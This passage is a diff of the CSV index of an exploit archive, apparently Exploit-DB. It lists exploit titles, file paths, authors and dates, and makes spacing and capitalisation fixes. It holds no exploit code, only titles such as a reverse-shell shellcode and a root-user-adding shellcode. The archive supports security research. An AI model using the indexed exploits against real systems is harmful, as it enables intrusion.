Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 +16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String",2010-04-30,Metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow",2010-09-20,Metasploit,linux,remote,0 @@ -14679,7 +14681,7 @@ id,file,description,date,author,platform,type,port 16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow",2010-04-05,Metasploit,osx,remote,0 16876,platforms/osx_ppc/remote/16876.rb,"Samba (Mac OSX PPC) - trans2open Overflow",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution",2010-10-06,Metasploit,irix,remote,0 -16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow",2010-12-02,Metasploit,linux,remote,0 +16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow",2010-12-02,Metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 - report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 16880,platforms/linux/remote/16880.rb,"Samba trans2open (*BSD/x86) - Overflow Exploit",2010-06-17,Metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti - graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 @@ -14690,7 +14692,7 @@ id,file,description,date,author,platform,type,port 16887,platforms/linux/remote/16887.rb,"HP Openview - connectedNodes.ovpl Remote Command Execution",2010-07-03,Metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP)",2010-08-25,Metasploit,linux,remote,0 16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution",2011-01-08,Metasploit,linux,webapps,0 -16890,platforms/php/webapps/16890.rb,"PHPBB - viewtopic.php Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16890,platforms/php/webapps/16890.rb,"phpBB - viewtopic.php Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server - parse_xml.cgi Remote Execution",2010-07-03,Metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers - rev Parameter Command Execution",2010-07-03,Metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda - IMG.pl Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 @@ -14719,7 +14721,7 @@ id,file,description,date,author,platform,type,port 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection",2010-07-03,Metasploit,freebsd,remote,0 16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution",2010-07-03,Metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution",2010-04-30,Metasploit,linux,remote,0 -16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,Metasploit,linux,remote,0 +16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution",2010-12-03,Metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,Metasploit,linux,remote,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web - Remote Command Execution",2010-10-09,Metasploit,hardware,webapps,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter - Blackhole-Mode Remote Code Execution",2010-10-09,Metasploit,linux,remote,0 @@ -14772,7 +14774,7 @@ id,file,description,date,author,platform,type,port 16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0 -16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd'Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 +16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - Javascript File Write",2011-03-14,Metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authenticated Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 @@ -14930,10 +14932,10 @@ id,file,description,date,author,platform,type,port 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar - MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager - Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 -17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - '.visprj'Buffer Overflow",2011-04-11,Metasploit,windows,local,0 +17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' Remote Code Execution Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 -17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - '.ord'Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 +17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - '.ord' Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 17158,platforms/windows/local/17158.txt,"Microsoft HTML Help 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 - Denial of Service",2011-04-12,"Luigi Auriemma",windows,dos,0 17160,platforms/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0 @@ -14942,7 +14944,7 @@ id,file,description,date,author,platform,type,port 17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection / Full Path Disclosure",2011-04-13,swami,php,webapps,0 -17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt'Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local,0 +17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local,0 17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,php,webapps,0 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 @@ -14985,15 +14987,15 @@ id,file,description,date,author,platform,type,port 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server - Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Persistent Cross-Site Scripting using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 -17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 +17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)",2011-04-29,webDEViL,windows,dos,0 17228,platforms/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b - SQL Injection",2011-04-29,Evil-Thinker,asp,webapps,0 -17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m'Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 -17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m'Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 +17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 +17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 - (build 2055) Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0 17317,platforms/windows/local/17317.rb,"VisiWave - VWR File Parsing Trusted Pointer",2011-05-23,Metasploit,windows,local,0 @@ -15054,7 +15056,7 @@ id,file,description,date,author,platform,type,port 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 - SQL Injection",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 -17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm'Stack Buffer Overflow",2011-05-22,Metasploit,windows,local,0 +17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow",2011-05-22,Metasploit,windows,local,0 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - 'search.php' SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",php,webapps,0 @@ -15110,7 +15112,7 @@ id,file,description,date,author,platform,type,port 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,Metasploit,windows,remote,0 -17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 +17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 @@ -15156,7 +15158,7 @@ id,file,description,date,author,platform,type,port 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 -17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat'Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 +17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injection",2011-06-23,w0rd,php,webapps,0 @@ -15201,7 +15203,7 @@ id,file,description,date,author,platform,type,port 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,Metasploit,windows,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0 -17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,Metasploit,unix,remote,0 +17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution",2011-07-05,Metasploit,unix,remote,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17495,platforms/php/webapps/17495.txt,"BbZL.php - File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 @@ -15261,7 +15263,7 @@ id,file,description,date,author,platform,type,port 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 -17564,platforms/osx/shellcode/17564.asm,"OS-X - Universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 +17564,platforms/osx/shellcode/17564.asm,"OS-X - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17567,platforms/osx/dos/17567.txt,"Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos,0 @@ -15276,7 +15278,7 @@ id,file,description,date,author,platform,type,port 17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart 1.1.7 - Blind time-based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 -17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 +17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 17584,platforms/php/webapps/17584.php,"cFTP 0.1 - (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 @@ -15443,7 +15445,7 @@ id,file,description,date,author,platform,type,port 17778,platforms/php/webapps/17778.txt,"Wordpress Zotpress plugin 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"Wordpress oQey Gallery plugin 0.4.8 - SQL Injection",2011-09-05,"Miroslav Stampar",php,webapps,0 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass)",2011-09-05,blake,windows,local,0 -17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt'Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 +17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 17782,platforms/php/webapps/17782.txt,"Elite Gaming Ladders 3.6 - SQL Injection",2011-09-05,J.O,php,webapps,0 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - ZIP File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 @@ -15478,7 +15480,7 @@ id,file,description,date,author,platform,type,port 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 -17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll'Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 +17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17823,platforms/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 17824,platforms/php/webapps/17824.txt,"Slaed CMS - Code Execution",2011-09-12,brain[pillow],php,webapps,0 @@ -15553,7 +15555,7 @@ id,file,description,date,author,platform,type,port 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OSX < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 -17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys'Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0 +17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",php,webapps,0 @@ -15570,7 +15572,7 @@ id,file,description,date,author,platform,type,port 17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0 -17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj'Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 +17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - .pdf File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 @@ -15663,7 +15665,7 @@ id,file,description,date,author,platform,type,port 40298,platforms/windows/dos/40298.py,"Goron Webserver 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 -18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3'Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 +18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 @@ -15955,7 +15957,7 @@ id,file,description,date,author,platform,type,port 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 Wordpress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 -18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff'Denial of Service",2012-04-04,condis,windows,dos,0 +18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS 1.2.4 - Multiple Persistent Cross-Site Scripting",2012-04-04,"Ivano Binetti",php,webapps,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow",2012-04-04,Metasploit,windows,remote,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 @@ -16191,7 +16193,7 @@ id,file,description,date,author,platform,type,port 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 -18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff'Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 +18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0 @@ -16252,7 +16254,7 @@ id,file,description,date,author,platform,type,port 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - (install/index.php) Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18776,platforms/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos,0 18777,platforms/windows/dos/18777.txt,".NET Framework EncoderParameter - Integer Overflow",2012-04-24,"Akita Software Security",windows,dos,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p parameter'SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p parameter' SQL Injection",2012-04-24,G13,php,webapps,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0 18781,platforms/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Buffer Overflow",2012-04-25,Metasploit,windows,local,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 @@ -16267,7 +16269,7 @@ id,file,description,date,author,platform,type,port 18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Stack Buffer Overflow (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 -18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4'Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 +18795,platforms/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",windows,dos,0 18800,platforms/php/webapps/18800.txt,"Alienvault OSSIM Open Source SIEM 3.1 - Multiple Security Vulnerabilities",2012-04-29,"Stefan Schurtz",php,webapps,0 18801,platforms/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18802,platforms/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - Cross-Site Scripting",2012-04-30,Vulnerability-Lab,asp,webapps,0 @@ -16325,7 +16327,7 @@ id,file,description,date,author,platform,type,port 18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette - 'picture.php' SQL 